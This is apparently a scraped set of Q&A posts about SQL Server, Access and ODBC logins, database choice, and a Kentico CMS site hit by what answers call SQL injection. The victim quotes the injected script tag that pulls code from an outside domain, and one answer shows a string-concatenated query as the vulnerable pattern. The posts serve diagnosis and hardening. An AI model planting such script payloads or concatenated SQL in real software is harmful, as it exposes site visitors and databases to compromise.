I'm in the process of converting an old application to work with SQL Server instead of hundreds of Paradox DB files.
I'm using ODBC and most of the stuff is working.
However I do have a problem.
In some forms, is asking for password. I've double checked the TDatabase and TTable components, added USER NAME=sa and PASSWORD=****** to the Parameters and turned OFF the LoginPrompt
What's missing?
Is there any other way to initialize just once all the 5 databases and don't ever ask for password again?!
I've checked other questions here at StackOverflow, but didn't find a suitable one :(
Thank you
You can use SQL Server "Windows Authentication" mode. You can assign the database permissions to a Windows Domain group/groups or individual Windows users. In this case the users will be automatically authenticated to the databases without prompts.
Related
I'm working on a database driven program in Visual Studio 2015, in C#, Windows Form Application, and I'm using SQL Server 2014 for my databases, downloaded the most recent version from the MSDN site.
I've got it working well. But if I want other users on other computers and different versions of Windows, this would require them to have SQL Server installed, correct?
Basically the app is used for storing current medications, moods, a mood quiz, symptoms, etc.. and I store all the results in SQL Server databases. They can be edited, deleted, etc through the program's GUI. Do the users need SQL Server installed to use this app?
If so, is there an alternative to keeping databases without having to have the SQL Server connections, or is there a way to do this without the users having to have SQL Server installed? I don't want remote connections to me, I want it standalone.
Does this make any sense? If not, I can explain more. I know way back in the days of Visual Basic 4 I was making, reading and writing databases without SQL. But that was 16 years ago. So I'm wondering what the easiest solution to this is. Thanks!
In other words, you want a database that you can a) distribute to end users freely and b) that will 'connect' just to the copy of the database they have stored locally.
Here are a few options ---
SQLite over ODBC is as-easy-to-use as MSSQL, the driver can be found here:
SQLite ODBC
Use ConfigurationManager.OpenExeConfiguration to read / write your app config .xml file and use it as a key / value store. I can provide examples if needed.
Dynamically create an Access database, it should work as well as MSSQL for most things, with less overhead. Here's how:
Create an Access Database
Use SQLIte DLL. Details on SO
create-sqlite-database-and-table
I am not very familiar with Access database till now i was only programming to SQL Server but now it's time to do so. I am building WinForms application which will be using Access database and i have some question related to that point if you don't mind. My application will be used by multiple users and there will be one access databsae. My questions as below:
Is there any problem with accessing access database in same time by many users or only one user can be connected?
If i develop my program to use access 2016 and some of my users will have diffrent windows version and also diffrent access version
will it works?
Should i know something else? :)
If your client want to have a file based database and this is a project constraint , MS Access is the best choice. If you want a more detailed advice, please let me know how many users will perform Read/Write or Read transactions, the size of the database and if the application will run in client-server mode in a LAN/WAN, Cloud or Remote Desktop environment.
Back to your questions:
Depending on these conditions you may range from 10 to 20/25 users. Remember that you can always try with MS Access and later upgrade to a MS SQL database in a couple of hours.
If your front-end application can link to a 2016 Access database, it will do that without installing MS Access to the clients that will run your App, i.e. the vb.net compiled App will install all needed drivers. If you develop your App within MS Access 2016 (Access Form and reports, some VBA) you can run it with the free runtime version of MS Access, but this only when no older version of Access is installed on the running workstation.
Please check with your client the real reasons for a file-based database...
To answer the questions as asked:
You might run into an issue with this, as access was really designed as a personal use database. Having anything more than a small handful of users hitting against it at once will in fact cause problems, as it's not really well designed for that purpose...
This should in theory be fine, as the application itself is interfacing with the database, not the end user...
It seems like you're taking a step backwards using access for this, and SQL might very well be better suited for this purpose. This isn't me trying to just bash access either, this comes from personal experience. Going with this sort of design is likely to cause you more headaches than good.
First English is not my native language, so this question can be answered somewhere else or may be duplicated, i tried to Google it, but i didn't find the proper way to describe my need so thank you for understanding.
i have two application (Server/Clients), The database is in the Server machine, and the Client application will just connect to the Database using Sql Server, I'm using EF, my question :
when i wanted to add Data Server, in the wizard it asks for SQL Authentication user :
I'm not sure, but i don't think i should use the "sa" account right !? can somebody confirm that to me please, and suggest me the right approach to do that ! thank you so much.
No, never use SA. Make a user for the server to use and givce it the needed rights. It is quite normal to have application specific logins on a database server.
My site is created in Kentico CMS 5.5 and SQL server 2008. Its running successfully but now these days any one of hacker hack my site and after a long time i found that in many of tables hacker add
></title><script src="http://lilupophilupop.com/sl.php"></script><!--
line in before of ever varchar cell. Suppose i have user table in that case before username it adds this string, before user's email-ID it adds this same string. How i can prevent my sql server by using this hacking. And what is the reason behind this?
How i can prevent my sql server by using this hacking.
First, you need to find out how the hacker got the data into your database (SQL injection, weak account password, ...). Then you can take appropriate actions.
And what is the reason behind this?
The hacker hopes that the varchar field is printed on a web page without being properly encoded first. If that happens, the user's browser will download and execute the script.
This looks like it could be an 'SQL Injection' attack probably aimed at sending your visitors to a malware of fraudlent site.
Unfortunatly as Kentico CMS is commercial software your options are limited. You won't have the source that you can tweak to prevent further attacks commint through the front end.
You may need to
Review the security of your SQL server and ensure that the attacker didn't connect to it directly
Update to the latest security patch for the CMS (if you pay for maintenance it's free)
Get support from Kentico, they may have seen this before
Clean up your data and remove the offending scripts
If none of that is sucessful you may be able to add triggers to the necessary tables in SQL to remove the scripts as they are inserted in the database.
You need to follow the industry best practices : look at
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
For the top 10 Web application security risks.
There are few things to keep in mind that save your database from hacking is given below:
Always use parametrized Sql, pass all values to DB using parametrized query
SqlCommand cmd = new SqlCommand("SELECT * FROM TableName WHERE ID = #ID");
Not
SqlCommand cmd = new SqlCommand("SELECT * FROM TableName WHERE ID = " + value + "");
Similarly, use INSERT, UPDATE, and DELETE query, or use STORED PROCEDURE in same manner.
Only set permission to your specific user
You can on/off ValidateRequest in your page/web.config file as required.
Set Validation both in client/server side so that only valid data will pass to DB
User appropriate data type in your column other than using a common data type (say VARCHAR)
Thanks
I agree with #Heinzi - you should make an effort to figure out the attack vector (how the baddie got into your application). You've found text in your database, but how did it get there? Directly via Sql Server or through the web server OR through Kentico? As you go through this investigative process, make notes of where your security is weak, and firm it up as you go - you're essentially doing a security audit! Doing these steps will lead you to harden your servers against most sort of attacks, hopefully preventing this sort of thing from happening to you again.
I don't know anything about your topology (how your servers are set up and connected to each other and the web), but we can make a start at investigating by looking into the windows log of the machine your sql server is installed on - look for logins happening at times that are questionable, look for odd user accounts, and examine your password and username security. Get more details of things to look into here:Windows Intruder Detection Checklist
If that doesn't turn up anything, look at the Sql server logs, and review your username/password security AND the access to the sql server instance; eg: the sql server should only be accessible from machines that have an explicit reason - your web server, maybe a network admin box, etc - use Windows Firewall to make the access 'tight', so that the sql server instance doesn't just respond to any computer asking. - Here's more details about how to secure sql server.
Check the web.config on your webserver - is the sql server username and password there? Check your ftp logs to see if anyone's tried to read it recently.
Kentico versions 5+ (and maybe earlier) come with the ability to log 'events'. If you have event logging turned on, you should be able to see your templates being modified; go to Site Manager > Administration > Event Log and go back to the date when you first noticed it, and examine the entries for what user account was doing the modifications.
Or even better: if you have access to the db server, you can do a direct table query to get at this data:
SELECT TOP 1000 *
FROM [CMS_EventLog] Look again for entries that seem to happen at odd times from weird Ip addresses or usernames.
And again, it's better to restrict access to all 'sensitive' resources (the Database, Kentico cmsdesk and siteadmin) as best you can. Windows Firewall is pretty great at doing this - tighten down Remote Desktop access, and close as many ports as you can to reduce your servers' exposed surface area. Test your exposure using something as simple as Shields Up! from Gibson Research or the Awesome Nmap security scanner tool.
As an example, my web servers only publicly expose ports 80 and 443 (http and https), and maybe a random high port like 4456 for Ftp if it's needed. I use Windows Firewall to restrict access to Remote Desktop to a handful of IP addresses. The Sql servers have NO public ports, they are tuned to 'stealth' and not reply to any request from a non-authorized IP.
As an anecdotal example - when I put a server live, it has taken as little as 8 hours before bots start trying to log in via remote desktop (you can see thousands of failed attempts in the windows Event Log > security) - as soon as you use windows firewall to ignore non-approved IP addresses, the log stays clear.
As a helpful note: if you are not experienced doing this sort of thing, you may want to procure the services of an experienced Windows system administrator to help you. And please realize that there may be more compromised systems - you may have just found the 'tip of the iceberg', there could be Trojans and Rootkits and other nasties waiting, so you'll need a full security scan too.
Lately there has been a problem running some of our reports in access. Last week(the beginning of the week) we tried to run a reports lets call it A and it kept giving us the log in prompt. Even when the correct user-name and password were entered the log in box would just keep reappearing until cancel was pressed.
I clicked the debug and checked the query. I then logged into the database it is pulling the data from with the same user-name and password and received no trouble. Around Wednesday A was working again, even though nothing was changed. This week A is working but another report B is doing the same thing..
Anyone have any idea what this could be? I'm thinking maybe someone else has the report open? Any help is appreciated.
EDIT: I have narrowed down the error to one linked table that is causing the login prompt. It seems it has the DSN setup but no database specified. So i just need to relink the table..Is there anyway to do this at the GUI level? Also should I leave this question up for future users or just delete it?
Was the login prompt from Access or from Windows? If from Windows, then I'd say that there was some sort of file permission or network access issue at hand. If from Access, then I would say that something in the SYSTEM.MDW that you are using is corrupt or has been reconfigured.
If the login prompt is from ODBC it probably means that the credentials that are being used to access the backend database (per your comments you mentioned it was SQL Server) are either invalid or disabled. (Or it could be as simple as the backend database is/was temporarily unavailable).
If you are using linked tables in Access to a SQL Server it means that an ODBC connection was created and you might try verifying that the ODBC connection is working ( Control Panel, Administrative Tools, Data Sources(ODBC) ). In that dialog there is a place to test the connection.